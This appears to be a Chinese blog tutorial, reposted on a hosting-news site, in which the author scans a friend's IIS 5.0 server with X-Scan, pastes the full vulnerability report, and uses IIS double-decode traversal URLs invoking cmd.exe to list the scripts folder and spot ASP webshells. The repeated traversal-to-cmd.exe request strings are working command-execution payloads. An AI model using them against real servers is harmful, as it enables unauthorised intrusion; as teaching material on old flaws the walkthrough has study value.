欢迎光临
我们一直在努力

利用X-Scan找ASP木马后门

建站超值云服务器,限时71元/月

 今天无聊连家都回不去呵呵~~朋友叫测试个站

打开地址一看呆拉!!可能是他故意难我吧打开地址后就这样:

[[[正在建立您想要连接的站点目前没有默认页。可能正在被进行升级。

请稍候再试此站点。假如问题仍然存在,请与 Web 站点管理员联系。 ]]]

呵呵!!

不怕有句老话不会扫描那就不是一个真正的黑客

来该X-Scan上场
****.**.**.**

扫描结果如下:

X-Scan 检测报告
——————

检测结果

– 存活主机 : 1
– 漏洞数量 : 22
– 警告数量 : 16
– 提示数量 : 6

主机列表

****.**.**.** (发现安全漏洞)
. OS: Windows; PORT/TCP: 21, 25, 53, 80, 443

详细资料

****.**.**.** :
. 开放端口列表 :
o smtp (25/tcp) (发现安全警告)
o domain (53/tcp) (发现安全提示)
o www (80/tcp) (发现安全漏洞)
o https (443/tcp) (发现安全提示)
o ftp (21/tcp) (发现安全提示)

. 端口"smtp (25/tcp)"发现安全警告 :

SMTP服务器不支持用户身份验证,允许匿名用户使用

. 端口"smtp (25/tcp)"发现安全提示 :

A SMTP server is running on this port
Here is its banner :
220 altsyz-web Microsoft ESMTP MAIL Service, Version: 5.0.2195.2966 ready at
Wed, 20 Oct 2004 06:28:38 +0800
NESSUS_ID : 10330

. 端口"domain (53/tcp)"发现安全提示 :

Maybe the "domain" service running on this port.

NESSUS_ID : 10330

. 端口"www (80/tcp)"发现安全漏洞 :
IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+di
. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:
http://****.**.**.**/scripts/..%u00255c..%u00255c..%u00255c..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir

. 端口"www (80/tcp)"发现安全漏洞 :

IIS编码/解码漏洞:

. 端口"www (80/tcp)"发现安全漏洞 :

The remote Microsoft Frontpage server seems vulnerable to a remote
buffer overflow. Exploitation of this bug could give an unauthorized
user access to the machine.

The following systems are known to be vulnerable:

Microsoft Windows 2000 Service Pack 2, Service Pack 3
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Office XP, Microsoft Office XP Service Release 1

Solution: Install relevant service pack or hotfix from URL below.

See als
http://www.microsoft.com/technet/security/bulletin/ms03-051.mspx

Risk factor : High
CVE_ID : CAN-2003-0822, CAN-2003-0824
NESSUS_ID : 11923
Other references : IAVA:2003-A-0033

. 端口"www (80/tcp)"发现安全漏洞 :

There’s a buffer overflow in the remote web server through
the ISAPI filter.

It is possible to overflow the remote web server and execute
commands as user SYSTEM.

Solution: See
http://www.microsoft.com/technet/security/bulletin/ms01-044.mspx
Risk factor : High
CVE_ID : CVE-2001-0544, CVE-2001-0545, CVE-2001-0506, CVE-2001-0507,
CVE-2001-0508, CVE-2001-0500
BUGTRAQ_ID : 2690, 3190, 3194, 3195
NESSUS_ID : 10685

. 端口"www (80/tcp)"发现安全漏洞 :

The IIS server appears to have the .HTR ISAPI filter mapped.

At least one remote vulnerability has been discovered for the .HTR
filter. This is detailed in Microsoft Advisory
MS02-018, and gives remote SYSTEM level access to the web server.

It is recommended that, even if you have patched this vulnerability,
you unmap the .HTR extension and any other unused ISAPI extensions
if they are not required for the operation of your site.

Solution :
To unmap the .HTR extension:
1.Open Internet Services Manager.
2.Right-click the Web server choose Properties from the context menu.
3.Master Properties
4.Select WWW Service -> Edit -> HomeDirectory -> Configuration
and remove the reference to .htr from the list.

In addition, you may wish to download and install URLSCAN from the
Microsoft Technet Website. URLSCAN, by default, blocks all requests
for .htr files.

Risk factor : High
CVE_ID : CVE-2002-0071
BUGTRAQ_ID : 4474
NESSUS_ID : 10932
Other references : IAVA:2002-A-0002

. 端口"www (80/tcp)"发现安全漏洞 :

The remote server is vulnerable to a buffer overflow in the .HTR
filter.

An attacker may use this flaw to execute arbitrary code on
this host (although the exploitation of this flaw is considered
as being difficult).

Solution:
To unmap the .HTR extension:
1.Open Internet Services Manager.
2.Right-click the Web server choose Properties from the context menu.
3.Master Properties
4.Select WWW Service -> Edit -> HomeDirectory -> Configuration
and remove the reference to .htr from the list.

See MS bulletin MS02-028 for a patch

Risk factor : High
CVE_ID : CVE-2002-0364, CVE-2002-0071
BUGTRAQ_ID : 4855
NESSUS_ID : 11028
Other references : IAVA:2002-A-0002

. 端口"www (80/tcp)"发现安全漏洞 :

The remote WebDAV server may be vulnerable to a buffer overflow when
it receives a too long request.

An attacker may use this flaw to execute arbitrary code within the
LocalSystem security context.

*** As safe checks are enabled, Nessus did not actually test for this
*** flaw, so this might be a false positive

Solution : See
http://www.microsoft.com/technet/security/bulletin/ms03-007.mspx
Risk Factor : High
CVE_ID : CAN-2003-0109
BUGTRAQ_ID : 7116
NESSUS_ID : 11412
Other references : IAVA:2003-A-0005

. 端口"www (80/tcp)"发现安全漏洞 :

When IIS receives a user request to run a script, it renders
the request in a decoded canonical form, then performs
security checks on the decoded request. A vulnerability
results because a second, superfluous decoding pass is
performed after the initial security checks are completed.
Thus, a specially crafted request could allow an attacker to
execute arbitrary commands on the IIS Server.

Solution: See MS advisory MS01-026(Superseded by ms01-044)
See http://www.microsoft.com/technet/security/bulletin/ms01-044.mspx

Risk factor : High
CVE_ID : CVE-2001-0507, CVE-2001-0333
BUGTRAQ_ID : 2708
NESSUS_ID : 10671

. 端口"www (80/tcp)"发现安全漏洞 :

There’s a buffer overflow in the remote web server through
the ASP ISAPI filter.

It is possible to overflow the remote web server and execute
commands as user SYSTEM.

Solution: See
http://www.microsoft.com/technet/security/bulletin/ms02-018.mspx
Risk factor : High
CVE_ID : CVE-2002-0079, CVE-2002-0147, CVE-2002-0149
BUGTRAQ_ID : 4485
NESSUS_ID : 10935
Other references : IAVA:2002-A-0002

. 端口"www (80/tcp)"发现安全警告 :

. 端口"www (80/tcp)"发现安全提示 :

A web server is running on this port
NESSUS_ID : 10330

. 端口"www (80/tcp)"发现安全提示 :

The remote web server type is :

Microsoft-IIS/5.0

Solution : You can use urlscan to change reported server for IIS.
NESSUS_ID : 10107

. 端口"https (443/tcp)"发现安全提示 :

Maybe the "https" service running on this port.

NESSUS_ID : 10330

. 端口"ftp (21/tcp)"发现安全提示 :

Maybe the "ftp" service running on this port.

NESSUS_ID : 10330》》》》》》》

结果发现IIS解码漏洞

那怎么利用呢高手就不用问拉

莱鸟继续》》》

发现没http://***.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir

这里要申明的是我讲的是找ASP木马后门

不做其它入侵

接下来我们打开它发现什么拉………………哈哈

Directory of d:\inetpub\scripts

2004-10-20 11:18 <DIR> .
2004-10-20 11:18 <DIR> ..
2004-10-20 10:34 1,169 admin_nighter.asp
2004-10-20 10:48 29,451 nighterasp1.5.asp
2000-02-09 22:39 15,760 NSIISLOG.DLL
2004-10-20 10:33 3,224 sniao.asp
2004-10-20 09:30 23,109 start.asp
2004-10-20 11:18 49,627 sx.asp

到这里应该明白是怎么回事情了吧

路径d:\inetpub

文件路径\scripts\

admin_nighter.asp

这就是木马    

赞(0)
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com 特别注意:本站所有转载文章言论不代表本站观点! 本站所提供的图片等素材,版权归原作者所有,如需使用,请与原作者联系。未经允许不得转载:IDC资讯中心 » 利用X-Scan找ASP木马后门
分享到: 更多 (0)